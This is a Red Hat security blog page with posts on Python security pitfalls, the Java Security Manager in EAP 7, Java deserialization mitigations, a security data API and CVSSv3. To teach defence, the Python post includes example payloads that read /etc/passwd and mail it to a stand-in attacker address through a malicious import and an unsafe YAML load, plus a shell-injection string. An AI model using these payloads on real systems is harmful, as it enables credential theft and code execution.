Red Hat Customer Portal

Skip to main content

Warning message

Log in to add comments.

Latest Posts

  • A bite of Python

    Authored by: Ilya Etingof

    Being easy to pick up and progress quickly towards developing larger and more complicated applications, Python is becoming increasingly ubiquitous in computing environments. Though apparent language clarity and friendliness could lull the vigilance of software engineers and system administrators -- luring them into coding mistakes that may have serious security implications. In this article, which primarily targets people who are new to Python, a handful of security-related quirks are looked at; experienced developers may well be aware of the peculiarities that follow.

    Input function

    In a large collection of Python 2 built-in functions, input is a total security disaster. Once called, whatever is read from stdin gets immediately evaluated as Python code:

       $ python2
        >>> input()
        dir()
        ['__builtins__', '__doc__', '__name__', '__package__']
       >>> input()
       __import__('sys').exit()
       $
    

    Clearly, the input function must never ever be used unless data on a script's stdin is fully trusted. Python 2 documentation suggests raw_input as a safe alternative. In Python 3 the input function becomes equivalent to raw_input, thus fixing this weakness once and forever.

    Assert statement

    There is a coding idiom of using assert statements for catching next to impossible conditions in a Python application.

       def verify_credentials(username, password):
           assert username and password, 'Credentials not supplied by caller'
    
           ... authenticate possibly null user with null password ...
    

    However, Python does not produce any instructions for assert statements when compiling source code into optimized byte code (e.g. python -O). That silently removes whatever protection against malformed data that the programmer wired into their code leaving the application open to attacks.

    The root cause of this weakness is that the assert mechanism is designed purely for testing purposes, as is done in C++. Programmers must use other means for ensuring data consistency.

    Reusable integers

    Everything is an object in Python. Every object has a unique identity which can be read by the id function. To figure out if two variables or attributes are pointing to the same object the is operator can be used. Integers are objects so the is operation is indeed defined for them:

        >>> 999+1 is 1000
        False
    

    If the outcome of the above operation looks surprising, keep in mind that the is operator works with identities of two objects -- it does not compare their numerical, or any other, values. However:

        >>> 1+1 is 2
        True
    

    The explanation for this behavior is that Python maintains a pool of objects representing the first few hundred integers and reuses them to save on memory and object creation. To make it even more confusing, the definition of what "small integer" is differs across Python versions.

    A mitigation here is to never use the is operator for value comparison. The is operator is designed to deal exclusively with object identities.

    Floats comparison

    Working with floating point numbers may get complicated due to inherently limited precision and differences stemming from decimal versus binary fraction representation. One common cause of confusion is that float comparison may sometimes yield unexpected result. Here's a famous example:

       >>> 2.2 * 3.0 == 3.3 * 2.0
       False
    

    The cause of the above phenomena is indeed a rounding error:

       >>> (2.2 * 3.0).hex()
       '0x1.a666666666667p+2'
       >>> (3.3 * 2.0).hex()
       '0x1.a666666666666p+2'
    

    Another interesting observation is related to the Python float type which supports the notion of infinity. One could reason that everything is smaller than infinity:

       >>> 10**1000000 > float('infinity')
       False
    

    However, up to Python 3, a type object beats the infinity:

       >>> float > float('infinity')
       True
    

    The best mitigation is to stick to integer arithmetic whenever possible. The next best approach would be to use the decimal stdlib module which attempts to shield users from annoying details and dangerous flaws.

    Generally, when important decisions are made based on the outcome of arithmetic operations, care must be taken not to fall victim to a rounding error. See the issued and limitations chapter in Python documentation.

    Private attributes

    Python does not support object attributes hiding. But there is a workaround based on the feature of double underscored attributes mangling. Although changes to attribute names occur only to code, attributes names hardcoded into string constants remain unmodified. This may lead to confusing behavior when a double underscored attribute visibly "hides" from getattr()/hasattr() functions.

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       ...   def get_private(self):
       ...     return self.__private
       ...   def has_private(self):
       ...     return hasattr(self, '__private')
       ... 
       >>> x = X()
       >>>
       >>> x.has_private()
       False
       >>> x.get_private()
       1
    

    For this privacy feature to work, attribute mangling is not performed on attributes out of class definition. That effectively "splits" any given double underscored attributive onto two depending on from where it is being referenced:

       >>> class X(object):
       ...   def __init__(self):
       ...     self.__private = 1
       >>>
       >>> x = X()
       >>>
       >>> x.__private
       Traceback
       ...
       AttributeError: 'X' object has no attribute '__private'
       >>>
       >>> x.__private = 2
       >>> x.__private
       2
       >>> hasattr(x, '__private')
       True
    

    These quirks could turn into a security weakness if a programmer relies on double underscored attributes for making important decisions in their code without paying attention to the asymmetrical behavior of private attributes.

    Module injection

    Python modules importing system is powerful and complicated. Modules and packages can be imported by file or directory name found in search path as defined by sys.path list. Search path initialization is an intricate process which is also dependent on Python version, platform and local configuration. To mount successful attack on a Python application, an attacker needs to find a way to smuggle a malicious Python module into a directory or importable package file which Python would consider when trying to import a module.

    The mitigation is to maintain secure access permissions on all directories and package files in search path to ensure unprivileged users do not have write access to them. Keep in mind that the directory where the initial script invoking Python interpreter resides is automatically inserted into the search path.

    Running script like this reveals actual search path:

       $ cat myapp.py
       #!/usr/bin/python
    
       import sys
       import pprint
    
       pprint.pprint(sys.path)
    

    On Windows platform, instead of script location, current working directory of the Python process is injected into the search path. On UNIX platforms, current working directory is automatically inserted into sys.path whenever program code is read from stdin or command line ("-" or "-c" or "-m" options):

       $ echo "import sys, pprint; pprint.pprint(sys.path)" | python -
       ['',
        '/usr/lib/python3.3/site-packages/pip-7.1.2-py3.3.egg',
        '/usr/lib/python3.3/site-packages/setuptools-20.1.1-py3.3.egg',
        ...]
       $ python -c 'import sys, pprint; pprint.pprint(sys.path)'
       ['',
        '/usr/lib/python3.3/site-packages/pip-7.1.2-py3.3.egg',
        '/usr/lib/python3.3/site-packages/setuptools-20.1.1-py3.3.egg',
        ...]
       $
       $ cd /tmp
       $ python -m myapp
       ['',
        '/usr/lib/python3.3/site-packages/pip-7.1.2-py3.3.egg',
        '/usr/lib/python3.3/site-packages/setuptools-20.1.1-py3.3.egg',
        ...]
    

    To mitigate the risk of module injection from current working directory explicitly changing directory to a safe one is recommended prior to running Python on Windows or passing code through command line.

    Another possible source for the search path is the contents of the $PYTHONPATH environment variable. An easy mitigation against sys.path population from process environment is the -E option to Python interpreter which makes it ignoring $PYTHONPATH variable.

    Code execution on import

    It may not look obvious that the import statement actually leads to execution of the code in the module being imported. That is why even importing mistrustful module or package is risky. Importing simple module like this may lead to unpleasant consequences:

       $ cat malicious.py
       import os
       import sys
    
       os.system('cat /etc/passwd | mail attacker@blackhat.com')
    
       del sys.modules['malicious']  # pretend it's not imported
       $ python
       >>> import malicious
       >>> dir(malicious)
       Traceback (most recent call last):
       NameError: name 'malicious' is not defined
    

    Combined with sys.path entry injection attack, it may pave the way to further system exploitation.

    Monkey patching

    A process of changing Python objects attributes at run-time is known as monkey patching. Being a dynamic language, Python fully supports run-time program introspection and code mutation. Once a malicious module gets imported one way or another, any existing mutable object could be insensibly monkey patched without programmer's consent. Consider this:

       $ cat nowrite.py
       import builtins
    
       def malicious_open(*args, **kwargs):
          if len(args) > 1 and args[1] == 'w':
             args = ('/dev/null',) + args[1:]
          return original_open(*args, **kwargs)
    
       original_open, builtins.open = builtins.open, malicious_open
    

    If the code above gets executed by Python interpreter, everything written into files won't be stored on the filesystem:

       >>> import nowrite
       >>> open('data.txt', 'w').write('data to store')
       5
       >>> open('data.txt', 'r')
       Traceback (most recent call last):
       ...
       FileNotFoundError: [Errno 2] No such file or directory: 'data.txt'
    

    Attacker could leverage Python garbage collector (gc.get_objects()) to get hold of all objects in existence and hack any of them.

    In Python 2 built-in objects can be accesses via the magic __builtins__ module. One of the known tricks, exploiting __builtins__ mutability, that might bring the world to its end is:

       >>> __builtins__.False, __builtins__.True = True, False
       >>> True
       False
       >>> int(True)
       0
    

    In Python 3 assignments to True and False won't work so they can't be manipulated that way.

    Functions are first-class objects in Python, they maintain references to many properties of a function. In particular, executable byte code is referenced by the __code__ attribute which, of course, can be modified:

       >>> import shutil
       >>>
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>
       >>> shutil.copy.__code__ = (lambda src, dst: dst).__code__
       >>>
       >>> shutil.copy('my_file.txt', '/tmp')
       '/tmp'
       >>> shutil.copy
       <function copy at 0x7f30c0c66560>
       >>>
    

    Once the above monkey patch is applied, despite shutil.copy function still looking sane, it silently stopped working due to the no-op lambda function code set to it.

    Type of Python object is determined by the __class__ attribute. Evil attacker could hopelessly mess up things by resorting to changing type of live objects:

       >>> class X(object): pass
       ... 
       >>> class Y(object): pass
       ... 
       >>> x_obj = X()
       >>> x_obj
       <__main__.X object at 0x7f62dbe5e010>
       >>> isinstance(x_obj, X)
       True
       >>> x_obj.__class__ = Y
       >>> x_obj
       <__main__.Y object at 0x7f62dbe5d350>
       >>> isinstance(x_obj, X)
       False
       >>> isinstance(x_obj, Y)
       True
       >>> 
    

    The only mitigation against malicious monkey patching is to ensure the authenticity and integrity of the Python modules being imported.

    Shell injection via subprocess

    Being known as a glue language, it is quite common for a Python script to delegate system administration tasks to other programs by asking the operating system to execute them, possibly providing additional parameters. The subprocess module offers easy to use and quite high-level service for such tasks.

       >>> from subprocess import call
       >>>
       >>> unvalidated_input = '/bin/true'
       >>> call(unvalidated_input)
       0
    

    But there is a catch! To make use of UNIX shell services, like command line parameters expansion, the shell keyword argument to the call function should be turned into True. Then the first argument to call function is passed as-is to the system shell for further parsing and interpretation. Once unvalidated user input reaches the call function (or other functions implemented in the subprocess module), a hole is opened to the underlying system resources.

       >>> from subprocess import call
       >>>
       >>> unvalidated_input = '/bin/true'
       >>> unvalidated_input += '; cut -d: -f1 /etc/passwd'
       >>> call(unvalidated_input, shell=True)
       root
       bin
       daemon
       adm
       lp
       0
    

    It is obviously much safer not to invoke UNIX shell for external command execution by leaving the shell keyword in its default False state and supplying a vector of command and its parameters to the subprocess functions. In this second invocation form, neither command nor its parameters are interpreted or expanded by shell.

       >>> from subprocess import call
       >>>
       >>> call(['/bin/ls', '/tmp'])
    

    If the nature of the application dictates the use of UNIX shell services, it is utterly important to sanitize everything that goes to subprocess making sure that no unwanted shell functionality can be exploited by malicious users. In newer Python versions, shell escaping can be done with the standard library's shlex.quote function.

    Temporary files

    While vulnerabilities based on improper use of temporary files strike many programming languages, they are still surprisingly common in Python scripts so it's probably worth mentioning here.

    Vulnerabilities of this kind leverage insecure file system access permissions, possibly involving intermediate steps, ultimately leading to data confidentiality or integrity issues. Detailed description of the problem in general can be found in CWE-377.

    Luckily, Python is shipped with the tempfile module in its standard library which offers high-level functions for creating temporary file names "in the most secure manner possible". Beware the flawed tempfile.mktemp implementation which is still present in the library for backward compatibility reasons. The tempfile.mktemp function must never be used! Instead, use tempfile.TemporaryFile, or tempfile.mkstemp if you need the temporary file to persist after it is closed.

    Another possibility of accidentally introducing a weakness is through the use of shutil.copyfile function. The problem here is that destination file is created in the most insecure manner possible.

    Security-savvy developer may consider first copying the source file into a random temporary file name, then renaming the temporary file to its final name. While this may look like a good plan, it can be rendered insecure by the shutil.move function if it is used for performing the renaming. Trouble is that if the temporary file is created on a file system other than the one where the final file is to reside, shutil.move will fail to move it atomically (via os.rename) and silently resort to the insecure shutil.copy. A mitigation would be to prefer os.rename over shutil.move as os.rename is guaranteed to fail explicitly on operations across file system boundaries.

    Further complications may arise from the inability of shutil.copy to copy all file meta data potentially leaving the created file unprotected.

    Not exclusively specific to Python, care must be taken when modifying files on file systems of non-mainstream types, especially remote ones. Data consistency guarantees tend to differ in the area of file access serialization. As an example, NFSv2 does not honour the O_EXCL flag to the open system call, which is crucial for atomic file creation.

    Insecure deserialization

    Many data serialization techniques exist, among them Pickle is designed specifically to de/serialize Python objects. Its goal is to dump live Python objects into an octet stream for storage or transmission, then reconstruct them back to possibly another instance of Python. The reconstruction step is inherently risky if serialized data is tampered with. The insecurity of Pickle is well recognized and clearly noted in Python documentation.

    Being a popular configuration file format, YAML is not necessarily perceived as a powerful serialization protocol capable of tricking a deserializer into executing arbitrary code. What makes it even more dangerous is that the de facto default YAML implementation for Python - PyYAML makes deserialization look very innocent:

       >>> import yaml
       >>>
       >>> dangerous_input = """
       ... some_option: !!python/object/apply:subprocess.call
       ...   args: [cat /etc/passwd | mail attacker@blackhat.com]
       ...   kwds: {shell: true}
       ... """
       >>> yaml.load(dangerous_input)
       {'some_option': 0}
    

    ...while /etc/passwd is being stolen. A suggested fix is to always use yaml.safe_load for handling YAML serialization you can't trust. Still, the current PyYAML default feels somewhat provoking considering other serialization libraries tend to use dump/load function names for similar purposes, but in a safe manner.

    Templating engines

    Web application authors adopted Python long ago. Over the course of a decade, quite a number of Web frameworks have been developed. Many of them utilize templating engines for generating dynamic web contents from, well, templates and runtime variables. Aside from web applications, templating engines found their way into completely different software such as the Ansible IT automation tool.

    When content is being rendered from static templates and runtime variables, there is a risk of user-controlled code injection through runtime variables. A successfully mounted attack against a web application may lead to a cross-site scripting vulnerability. Usual mitigation for server-side template injection is to sanitize the contents of template variables before it interpolates into the final document. The sanitization can be done by denying, stripping off or escaping characters that are special to any given markup or other domain-specific language.

    Unfortunately, templating engines do not seem to lean towards tighter security here -- looking at the most popular implementations, neither of them apply escaping mechanism by default, relying on a developer's awareness of the risks.

    For example, Jinja2, which is probably one of the most popular tools, renders everything:

       >>> from jinja2 import Environment
       >>>
       >>> template = Environment().from_string('')
       >>> template.render(variable='<script>do_evil()</script>')
       '<script>do_evil()</script>'
    

    ...unless one of many possible escaping mechanisms is explicitly engaged by reversing its default settings:

       >>> from jinja2 import Environment
       >>>
       >>> template = Environment(autoescape=True).from_string('')
       >>> template.render(variable='<script>do_evil()</script>')
       '&lt;script&gt;do_evil()&lt;/script&gt;'
    

    An additional complication is that, in certain use-cases, programmers do not want to sanitize all template variables, intentionally leaving some of them holding potentially dangerous content intact. Templating engines address that need by introducing "filters" to let programmers explicitly sanitize the contents of individual variables. Jinja2 also offers a possibility of toggling the escaping default on a per-template basis.

    It can get even more fragile and complicated if developers choose to escape only a subset of markup language tags letting others legitimately sneaking into the final document.

    Conclusion

    This blog post is not meant to be a comprehensive list of all potential traps and shortcomings specific to the Python ecosystem. The goal is to raise awareness of security risks that may come into being once one starts coding in Python, hopefully making programming more enjoyable, and our lives more secure.

    Posted: 2016-09-07T13:30:00+00:00
  • Using the Java Security Manager in Enterprise Application Platform 7

    Authored by: Jason Shepherd

    JBoss Enterprise Application Platform 7 allows the definition of Java Security Policies per application. The way it's implemented means that we'll also be able to define security policies per module, in addition to define one per application. The ability to apply the Java Security Manager per application, or per module in EAP 7, makes it a versatile tool in the mitigation of serious security issues, or useful for applications with strict security requirements.

    The main difference between EAP 6, and 7 is that EAP 7 implements the Java Enterprise Edition 7 specification. Part of that specification is the ability to add Java Security Manager permissions per application. How that works in practice is that the Application Server defines a minimum set of policies that need to be enforced, as well as a maximum set of policies that an application is allowed to grant to itself.

    Let’s say we have a web application which wants to read Java System Properties. For example:

    System.getProperty("java.home");

    If you ran with the Security Manager enabled, this call would throw an AccessControlException. In order to enable the security manager, start JBoss EAP 7 with the option -secmgr, or set SECMGR to true in standalone, or domain configuration files.

    Now if you added the following permissions.xml file to the META-INF folder in the application archive, you could grant permissions for the Java System Property call:

    Add to META-INF/permissions.xml of application:

    <permissions ..>
            <permission>
                    <class-name>java.util.PropertyPermission</class-name>
                    <name>*</name>
                    <actions>read,write</actions>
            </permission>
    </permissions>
    

    The Wildfly Security Manager in EAP 7 also provides some extra methods for doing privileged actions. Privileged actions are ones that won't trigger a security check. However in order to use these methods, the application will need to declare a dependency on the Wildfly Security Manager. These methods can be used by developers instead of the built in PrivilegedActions in order to improve the performance of the security checks. There are a few of these optimized methods:

    • getPropertyPrivileged
    • getClassLoaderPrivileged
    • getCurrentContextClassLoaderPrivileged
    • getSystemEnvironmentPrivileged

    For more information about custom features built into the Wildlfy Security Manager, see this presentation slide deck by David Lloyd.

    Out of the box EAP 7 ships with a minimum, and maximum policy like so:

    $EAP_HOME/standalone/configuration/standalone.xml:

    <subsystem xmlns="urn:jboss:domain:security-manager:1.0">
        <deployment-permissions>
            <maximum-set>
                <permission class="java.security.AllPermission"/>
            </maximum-set>
        </deployment-permissions>
    </subsystem>
    

    That doesn't enforce any particular permissions on applications, and grants them AllPermissions if they don’t define their own. If an administrator wanted to grant at least permissions to read System Properties to all applications then they could add this policy:

    $EAP_HOME/standalone/configuration/standalone.xml:

    <subsystem xmlns="urn:jboss:domain:security-manager:1.0">
        <deployment-permissions>
            <minimum-set>
                <permission class="java.util.PropertyPermission" name="*" actions="read,write"/>
            </minimum-set>
            <maximum-set>
                <permission class="java.security.AllPermission"/>
            </maximum-set>
        </deployment-permissions>
    </subsystem>
    

    Alternatively if they wanted to restrict all permissions for all applications except FilePermission than they should use a maximum policy like so:

    <subsystem xmlns="urn:jboss:domain:security-manager:1.0">
        <deployment-permissions>
            <maximum-set>
                <permission class="java.io.FilePermission" name="/tmp/abc" actions="read,write"/>
            </maximum-set>
        </deployment-permissions>
    </subsystem>
    

    Doing so would mean that the previously described web applications which required PropertyPermission would fail to deploy, because it is trying to grant permissions to Properties, which is not granted by the application administrator. There is a chapter on using the security manager in the official documentation for EAP 7.

    Enabling the security manager after development of an application can be troublesome because a developer would then need to add the correct policies one at a time, as the AccessControlExceptions where hit. However the Wildfly Security Manager EAP 7 will have a debug mode, which if enabled, doesn’t enforce permission checks, but logs violations of the policy. In this way, a developer could see all the permissions which need to be added after one test run of the application. This feature hasn’t been backported from upstream yet, however a request to get it backported has been made. In EAP 7 GA release you can get extra information about access violations by enabling DEBUG logging for org.wildfly.security.access.

    When you run with the Security Manager in EAP 7 each module is able to declare it’s own set of unique permissions. If you don’t define permissions for a module, a default of AllPermissions is granted. Being able to define Security Manager policies per module is powerful because you can prevent sensitive, or vulnerable features of the application server from a serious security impact if it’s compromised. That gives the ability for Red Hat to provide a workaround for a known security vulnerability via a configuration change to a module which limits the impact. For example, to restrict the permissions of the JGroups modules to only the things required you could add the following permissions block to the JGroups:

    $EAP_HOME/modules/system/layers/base/org/jgroups/main/module.xml:

    <permissions>
        <grant permission="java.io.FilePermission" name="${env.EAP_HOME}/modules/system/layers/base/org/jgroups/main/jgroups-3.6.6.Final-redhat-1.jar" actions="read"/>
        <grant permission="java.util.PropertyPermission" name="jgroups.logging.log_factory_class" actions="read"/>
        <grant permission="java.io.FilePermission" name="${env.EAP_HOME}/modules/system/layers/base/org/jboss/as/clustering/jgroups/main/wildfly-clustering-jgroups-extension-10.0.0.CR6-redhat-1.jar" actions="read"/>
        ...
    </permissions>
    

    In EAP 7 GA the use of ${env.EAP_HOME} as above won't work yet. That feature has been implemented upstream and backporting can be tracked. That feature will make file paths compatible between systems by adding support for System Property, and Environment Variable expansion in module.xml permission blocks, making the release of generic security permissions viable.

    While the Security Manager could be used to provide multi-tenancy for the application server, Red Hat does not think that it's suitable for that. Our Java multi-tenancy in Openshift is achieved by running each tenant’s application in a separate Java Virtual Machine, with the Operating System providing sandboxing via SELinux. This was discussed within the JBoss community, with the view of Red Hat reflected in this post

    In conclusion EAP 7 introduced the Wildfly Java Security Manager which allows an application developer to define security policies per application, while also allowing an application administrator the ability to define security policies per module, or a set of minimum, or maximum security permissions for applications. Enabling the Security Manager will have an impact on performance. Red Hat recommends taking a holistic approach to security of the application, and not relying on the Security Manager only.

    Posted: 2016-07-13T13:30:00+00:00
  • Java Deserialization attacks on JBoss Middleware

    Authored by: Jason Shepherd

    Recent research by Chris Frohoff and Gabriel Lawrence has exposed gadget chains in various libraries that allow code to be executed during object deserialization in Java. They've done some excellent research, including publishing some code that allows anyone to serialize a malicious payload that when deserialized runs the operating system command of their choice, as the user which started the Java Virtual Machine (JVM). The vulnerabilities are not with the gadget chains themselves but with the code that deserializes them.

    What is a gadget chain?

    Perhaps the simplest example is a list. With some types of lists, it’s necessary to compare objects in order to determine their order in the list. For example a PriorityQueue orders objects by comparing them with each other during it’s construction. It takes a Comparator object which will call any method you choose on the objects in the list. Now if that method contains a call to Runtime.exec(), then you can execute that code during construction of the PriorityQueue object.

    Mitigation

    There are couple of ways in which this type of attack on the JVM can be mitigated:

    1. not deserializing untrusted objects;
    2. not having the classes used in the 'gadget chain' in the classpath;
    3. running the JVM as a non-root operating system user, with reduced privileges;
    4. egress filtering not allowing any outbound traffic other than that matching a connection for which the firewall already has an existing state table entry.

    The first is the best approach, as it prevents every kind of gadget chain a malicious attacker can create, even one devised from classes in the JVM itself. The second is OK, but has it's limits as there are new gadget chains made public often, and it's hard to keep up with the growing tide of them. Fortunately Enterprise Application Platform (EAP) 6 introduced module classloader that restricts which classes are available in the classpath of each module. It's much harder to find a classloader that has access to all the classes used by the gadget chain.

    The 3rd and 4th option are just good general security practices. If you want to serve content on port 80 of your host, you should use a firewall, or load balancer to redirect requests from port 80 to the JVM on another port above 1024, where your unprivileged JVM process is listening. You should not run a JVM as root in order to bind to a port less than 1024, as doing so will allow a compromised JVM to run commands as root.

    Egress filtering is particularly useful as a mitigation against deserialization attacks because output from the remote code execution is not returned to an attacker. The technique used by Java deserialization attacks results in the normal flow of Java execution being interrupted and an exception being thrown. So while an attacker has write and execute permissions of the user running the JVM, they don't have access to read files or shell command output, unless they can open a new connection which "phones home".

    EAP 5

    EAP 5 is still widely used, and does allow deserialization of untrusted objects via the Legacy Invoker Servlet. On top of that, its classloading structure is flat, with most libraries, including the classes from the gadget chains, available in the classpath. For anyone still running EAP 5 it is highly recommended to only bind the Legacy Invoker Servlet to a network interface card (NIC) which is not publicly accessible. This also applies to products layered on EAP 5, such as SOA-Platform (SOA-P) 5.

    EAP 6 and EAP 7

    While EAP 6, and EAP 7 are more robust because of the module classloader system, they can still be vulnerable. Users of these versions who are utilizing the clustering features should ensure that they are running their clustering on a dedicated Virtual Local Area Network (VLAN) and not over the Internet. That includes users of JBoss Data Grid (JDG) which uses the clustering features in the default configuration. If you don’t have a dedicated VLAN make sure you encrypt your clustering traffic. This issue is addressed in the JBoss Middleware product suite by the fix for CVE-2016-2141.

    Summary

    While deserialization attacks are a serious threat to JBoss Middleware, with the correct planning, and deployment configuration, the risk can be greatly reduced. Anyone running EAP 5, or layered products, should disable or restrict access to the Legacy Invoker Servlet, while anyone using the clustering feature in EAP should apply the fix for CVE-2016-2141, or make sure their clustering traffic is sent only over a dedicated VLAN.

    Posted: 2016-07-06T13:30:00+00:00
  • Redefining how we share our security data.

    Authored by: Vincent Danen

    Red Hat Product Security has long provided various bits of machine-consumable information to customers and users via our Security Data page. Today we are pleased to announce that we have made it even easier to access and parse this data through our new Security Data API service.

    While we have provided this information since January 2005, it required end users to download the content from the site, which meant you either downloaded many files and kept a local copy, or you were downloading large files on a regular basis. It also meant that, as part of writing the parser, if you were looking for certain criteria, you had to account for that criteria in your parser, which could make it more complex and difficult to write.

    Although the Security Data API doesn’t remove the need for a parser (you need something to handle the provided data), it does offer a lot of search options so that you can leverage the API to obtain real time data.

    So what information can you obtain via the API? Currently it provides CVE information for flaws that affected components we ship in supported products, as well as CVRF (Common Vulnerability Reporting Framework) documents and OVAL (Open Vulnerability Assessment Language) definitions. While CVRF documents and OVAL definitions are provided in their native XML format, the API also provides that information in JSON format for easier parsing. This means that you can use any CVRF or OVAL parser with the feed, and you can also write your own JSON parser to get the representative data for them as well.

    Most users will be interested in the CVE data, which we have been providing as part of our CVE database since August 2009. If you wanted to get information on CVE-2016-0800, for instance, you would visit the CVE page: https://access.redhat.com/security/cve/CVE-2016-0800. If you were using this information for some vulnerability assessment or reporting, you would have had to do some web scraping and involve other documents on our Security Data page.

    With the Security Data API you can view the information for this CVE in two ways: XML and JSON. This uses our own markup to describe the flaw, and from this view you can see the CVSSv2 score and metrics (or CVSSv3 score and metrics), as well as impact rating, links to Bugzilla, the date it went public, and other details of the flaw.

    While this is interesting, and we think it will be incredibly useful, the really compelling part of the API is the search queries you can perform. For instance, if you wanted to find all Critical impact flaws with a CVSSv2 score of 8 or greater, you would visit https://access.redhat.com/labs/securitydataapi/cve.json?severity=critical&cvss_score=8.0 and get a nice JSON output of CVEs that meet this criteria.

    If you wanted to find all CVEs that were public a week ago (assuming today is June 1st 2016), you would use https://access.redhat.com/labs/securitydataapi/cve.json?after=2016-05-24 and if you further wanted to get only those that affected the firefox package, you would use https://access.redhat.com/labs/securitydataapi/cve.json?after=2016-05-24&package=firefox.

    Perhaps you only want information on the CVEs that were addressed in RHSA-2016:1217. You could use https://access.redhat.com/labs/securitydataapi/cve.json?advisory=RHSA-2016:1217 to get the list of CVEs and some of their details and then iterate through the CVEs to get further details of each.

    The same search parameters are available for CVRF documents and OVAL definitions. You have the flexibility to obtain the details via XML or JSON. The ability to get the data in multiple formats allows you to write parsers for any of these formats and also allows you to write the parsers in any language you choose. These parsers can further take arguments such as severity, date ranges, CVSS scores, CWE identifiers, package names and more, which are in turn used as search criteria when using the API.

    Red Hat Product Security strives to be as transparent as possible when it comes to how we handle security flaws, and the Security Data page has been the primary source of this information, as far as machine-consumable content is concerned. With the availability of the Security Data API, we think this is the best and most user-friendly way to consume this content and are pleased to provide it. Being able to programmatically obtain this information on-the-fly will now allow Red Hat customers and users to generate all kinds of interesting reports, or enhance existing reports, all in real-time.

    We are also pleased to say that the beta API does not require any kind of authentication or login to access and it is available for anyone to use.

    There is one last thing to note, however. The API, at this time, is in beta and the structure of the content, including how it is searched, may change at any time without any prior notification. We will be only supporting this one version of the API for now, however if we make any changes we will note that in the documentation.

    For further information and instructions on how to use the API, please visit the Security Data API documentation. If you encounter an error in any of the data, please contact us and let us know.

    Posted: 2016-06-23T13:30:00+00:00
  • How Red Hat uses CVSSv3 to Assist in Rating Flaws

    Authored by: Christopher Robinson

    Humans have been measuring risk since the dawn of time. "I'm hungry, do I go outside my awesome cave here and forage for food? There might be something bigger, scarier, and hungrier than me out there...maybe I should wait?" Successfully navigating through life is a series of Risk/Reward calculations made each and every day. Sometimes, ideally, the choices are small ("Do I want fries with that?") while others can lead to catastrophic outcomes if the scenario isn't fully thought-through and proper mitigations put into place.

    Several years ago, Red Hat began publishing a CVSS score along with our own impact rating for security flaws that affected Red Hat products. CVSS stands for Common Vulnerability Scoring System and is owned and managed by FIRST.Org. FIRST is a non-profit organization based in the United States, and is dedicated to assisting incident response teams all over the globe. CVSS provides a numeric score of a vulnerability ranging from 0.0 up to 10.0. While not perfect, it is additional feedback that can be taken when trying to evaluate the urgency with which a newly-delivered patch must be deployed in your environment. The v2 incarnation of the system, while a nice move in the direction of quantitative analysis, had many rough edges and did not accurately depict many of the more modern computing scenarios under which our customers deploy technology.

    Last year, in 2015, the FIRST organization, stewards of the CVSS scoring system (along with several other useful assessment tools) published the next generation of CVSS: version 3. v3 gives a security practitioner better dials and adjustments to get a more accurate representation of a risk presented by a software flaw. Using CVSSv2, it was challenging to express how software was vulnerable when the underlying host/operating system was only partially/minimally impacted. CVSSv3 addresses this issue with updates to improve the possible values for impact metrics and introduces a new metric called Scope.

    An important conceptual change in CVSSv3 is the ability to score vulnerabilities that exist in one software component (now referred to as the vulnerable component) but which impact a separate software, hardware, or networking component (now referred to as impacted component).

    It is important to note that Red Hat uses CVSS scores solely as a guideline and we provide severity ratings of vulnerabilities in our products using a four-point scale based on impact. For more information specific to how Red Hat rates flaws (which also illustrates how we use CVSS as a guideline) please see: https://access.redhat.com/security/updates/classification/ .

    CVSSv3 now also provides a standard mapping from numeric scores to severity rating terms: None, Low, Medium, High and Critical. These numbers are very useful in starting to understand the risks involved, but ultimately they are one of several factors that goes into Red Hat’s severity rating, which may not always dictate what the final rating is.

    The Base Metrics now are:

    • Attack Vector (AV) - Expresses the "remoteness" of the attack and how the vulnerability is exploited.
    • Attack Complexity (AC) - Speaks to how hard the attack is to execute and what factors are needed for it to be successful. (The older Access Complexity metric is now split into Attack Complexity and User Interaction.)
    • User Interaction (UI) - Determines whether the attack require an active human to participate or if the attack is automated.
    • Privileges Required (PR) - Documents the level of user authentication required for attack to be successful (replaces older Authentication metric).
    • Scope (S) - Determines whether an attacker can affect a component that has a different level of authority.

    It’s important to note that User Interaction is now separate from Attack Complexity. In CVSSv2 it was not easy to determine if there was any user interaction required from the attack complexity metric alone, but with CVSSv3, it’s scored as a separate metric, making it more explicit what part of the scoring metric is related to user interaction.

    One question that must always be answered is, what kind of damage can be done if an attack is successfully executed? This is still measured by the CIA triad (Confidentiality, Integrity, Availability) however the values are now "None" to "Low" to "High" rather than “None” to “Partial” to “Complete” as they are in CVSSv2.

    • Confidentiality (C) - Determines whether data can be disclosed to non-authorized parties, and if so to what level.
    • Integrity (I) - This measures how trustworthy the data is and how far it can be trusted to not be modified by unauthorized users.
    • Availability (A) - This metric is concerned with data or services being accessible to authorized users when they need to access it.

    The CVSSv3 standard also has in it the ability to measure compensating controls that might exist in an environment, or based off of the timeline of the attack. These are measured in the Temporal and Environmental metrics. Red Hat cannot speak to countermeasures that may or may not exist in a customer's network, and therefore will not publish scoring based on these dimensions. To truly measure the residual level of risk in your environment you may also desire to use those metrics to communicate vulnerabilities within your organizations.

    Complete descriptions of the new metrics can be found at: https://www.first.org/cvss/user-guide.

    When using these new criteria, Red Hat will continue to evaluate the risks that vulnerabilities bring based off of the context of how the flaw adversely affects the component in relation to other products. Sometimes Red Hat CVSSv3 scoring may differ from that of other organizations' ratings. For open source software shipped by multiple vendors, the CVSSv3 base scores may vary for each vendor's version, depending on the version they ship, how they ship it, the platform, and even how the software is compiled. This makes scoring of vulnerabilities difficult for third-party vulnerability databases, such as NVD, who can give only a single CVSSv3 base score to each vulnerability. More details can be found by reading CVSSv3 Base Metrics

    To illustrate some of the differences between the old method and the new method, we provide the following examples:

    Flaw type CVSSv3 Metrics CVSSv2 Metrics (for comparison)
    Many XSS, CSRF 6.1/CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 4.3/AV:N/AC:M/Au:N/C:N/I:P/A:N
    NULL dereference C:N/I:N/A:L C:N/I:N/A:P
    info leak C:L/I:N/A:N C:P/I:N/A:N
    tempfile/symlink C:N/I:L/A:N C:N/I:P/A:N
    most wireshark flaws 6.5/CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 2.9/AV:A/AC:M/Au:N/C:N/I:N/A:P
    most browser ACEs 7.3/CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 6.8/AV:N/AC:M/Au:N/C:P/I:P/A:P
